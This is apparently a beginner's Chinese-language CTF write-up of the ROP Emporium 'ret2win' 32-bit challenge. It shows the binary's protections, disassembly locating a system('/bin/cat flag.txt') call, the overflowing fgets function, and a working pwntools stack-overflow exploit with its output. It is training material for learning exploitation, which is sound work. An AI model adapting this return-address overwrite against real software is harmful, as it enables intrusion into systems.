一个pwn新手的笔记
1.检查
1.1保护和字符串
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[0x08048480]> iz
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00000710 0x08048710 23 24 .rodata ascii ret2win by ROP Emporium
1 0x00000728 0x08048728 7 8 .rodata ascii 32bits\n
2 0x00000730 0x08048730 8 9 .rodata ascii \nExiting
3 0x0000073c 0x0804873c 125 126 .rodata ascii For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\nWhat could possibly go wrong?
4 0x000007bc 0x080487bc 100 101 .rodata ascii You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\n
5 0x00000824 0x08048824 28 29 .rodata ascii Thank you! Here's your flag:
6 0x00000841 0x08048841 17 18 .rodata ascii /bin/cat flag.txt
- 发现0x08048841有引用字符串/bin/cat flag.txt
1.2查看引用
[0x08048480]> ax. 0x08048841
sym.ret2win 0x8048672 [DATA] push str.bin_cat_flag.txt
[0x08048480]> pd @0x8048672
│ 0x08048672 6841880408 push str.bin_cat_flag.txt ; 0x8048841 ; "/bin/cat flag.txt" ; const char *string
│ 0x08048677 e8b4fdffff call sym.imp.system ; int system(const char *string)
│ 0x0804867c 83c410 add esp, 0x10
│ 0x0804867f 90 nop
│ 0x08048680 c9 leave
└ 0x08048681 c3 ret
0x08048682 6690 nop
............
; DATA XREF from entry0 @ 0x8048490
- 确认cat flag地址:0x08048672
2.1函数分析
- main
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
puts("ret2win by ROP Emporium");
puts("32bits\n");
pwnme();
puts("\nExiting");
return 0;
}
- pwnme
char *pwnme()
{
char s; // [esp+0h] [ebp-28h]
memset(&s, 0, 0x20u);
puts(
"For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\n"
"What could possibly go wrong?");
puts("You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\n");
printf("> ");
return fgets(&s, 0x32, stdin);
}
3.1 EXP
from pwn import *
#context.log_level = "debug"
p = process("./ret2win32")
cat_flag = 0x08048672
payload = '\x00'*(0x28+4) + p32(cat_flag)
p.sendlineafter("> ",payload)
print(p.recv())
3.2效果:
[+] Starting local process './ret2win32': pid 378
ROPE{a_placeholder_32byte_flag!}
[*] Stopped process './ret2win32' (pid 378)
4
开始熟悉32位程序的结构